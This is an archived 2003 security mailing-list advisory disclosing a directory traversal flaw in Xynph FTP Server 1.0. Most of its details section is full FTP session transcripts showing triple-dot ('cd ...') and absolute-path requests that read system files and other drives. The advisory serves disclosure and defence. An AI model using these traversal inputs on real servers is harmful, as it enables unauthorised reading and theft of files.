[NT] Directory Traversal Bug Found in Xynph FTP Server

From: support@securiteam.com
Date: 01/21/03

  • Next message: support@securiteam.com: "[UNIX] CVS Remote Vulnerability" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 21 Jan 2003 18:20:06 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Directory Traversal Bug Found in Xynph FTP Server
    ------------------------------------------------------------------------

    SUMMARY

    A security vulnerability in Xynph FTP server allows remote attackers to
    traverse into directories below those bounded by the FTP root, by using a
    triple dot attack (...) and to download any file they wish to by providing
    the program with a complete path to the file (i.e. c:\config.sys).

    DETAILS

    Vulnerable systems:
     * Xynph FTP Server 1.0

    Example (Directory Traversal):
    #######################################################
    Verbindung mit zero-x.
    220 Herzlich Willkommen! <-Xynph FTP-Server->
    Benutzer (zero-x:(none)): anonymous
    331 Password required for anonymous.
    Kennwort: billsucks
    230 User anonymous logged in.
    Ftp> pwd
    257 "C:/Temp/" is current directory.
    Ftp> cd ..
    501 CWD failed. No permission
    Ftp> cd ...
    250 CWD command successful. "C:/Temp/.../" is current directory.
    Ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 .
    drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 ..
    drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Programme
    drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 command.com
    drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Autoexec.bat
    drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 config.sys
    drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Windows
    drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Cygwin
    drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Top-Secret
    226 File sent ok
    Ftp: 31337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
    Ftp> get config.sys
    200 Port command successful.
    150 Opening data connection for config.sys.
    226 File sent ok
    Ftp: 1337 Bytes empfangen in 0.06Sekunden 2.92KB/Sek.
    Ftp>
    #######################################################

    Further, you can read all drives present on the computer.

    Example (Downloading files from anywhere):
    #######################################################
    Ftp> open zero-x
    Verbindung mit zero-x.
    220 Herzlich Willkommen! <-Xynph FTP-Server->
    Benutzer (zero-x:(none)): anonymous
    331 Password required for anonymous.
    Kennwort: billsucks
    230 User anonymous logged in.
    Ftp> get c:\config.sys
    200 Port command successful.
    150 Opening data connection for c:\config.sys.
    226 File sent ok
    Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
    Ftp> dir a:\
    200 Port command successful.
    150 Opening data connection for directory list.
    -rw-rw-rw- 1 ftp ftp 305113 Dec 15 2002 1.jpg
    -rw-rw-rw- 1 ftp ftp 313497 Dec 15 2002 4.jpg
    -rw-rw-rw- 1 ftp ftp 326046 Dec 15 2002 2.jpg
    -rw-rw-rw- 1 ftp ftp 357910 Dec 15 2002 3.jpg
    226 File sent ok
    Ftp: 31337 Bytes empfangen in 0.00Sekunden 244000.00KB/Sek.
    Ftp>
    #######################################################

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:zero-x@linuxmail.org> Zero-X
    www.lobnan.de Team.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages

    • RE: Mitigate FTP
      ... Yes, using ssh/sftp will help; ... For your customer base, I assume they are mostly Windows users; ... Security may be able to fine tune the threshold accordingly. ... Subject: Mitigate FTP ...
      (Pen-Test)
    • [NT] Windows FTP Client Allows File Transfer Location Tampering (MS05-044)
      ... Get your security news from a reliable source. ... A tampering vulnerability exists in the Windows FTP client. ... * Microsoft Windows Server 2003 for Itanium-based Systems - ...
      (Securiteam)
    • [NEWS] Symantec Enterprise Firewall FTP Bounce Vulnerability (Patch Available)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Raptor Firewall FTP Bounce Vulnerability. ... PORT command referenced a destination that doesn't ...
      (Securiteam)
    • [UNIX] SafeTP Reveals Internal Server IP Addresses
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Protocol) to connect to their accounts on UNIX or NT/2000 FTP servers. ... check out the "227 Entering Passive Mode ... Timed out waiting for connection from server. ...
      (Securiteam)
    • RE:[fw-wiz] Vulnerability Scanners ( was: concerning ~el8 / project mayhem )
      ... >>access control should be in place that prevents FTP traffic ... >>w.x.y.z is running an FTP server and you can access it. ... One major provider with a foot in the security realm has had ... Of course doing that documentation would impact ...
      (Firewall-Wizards)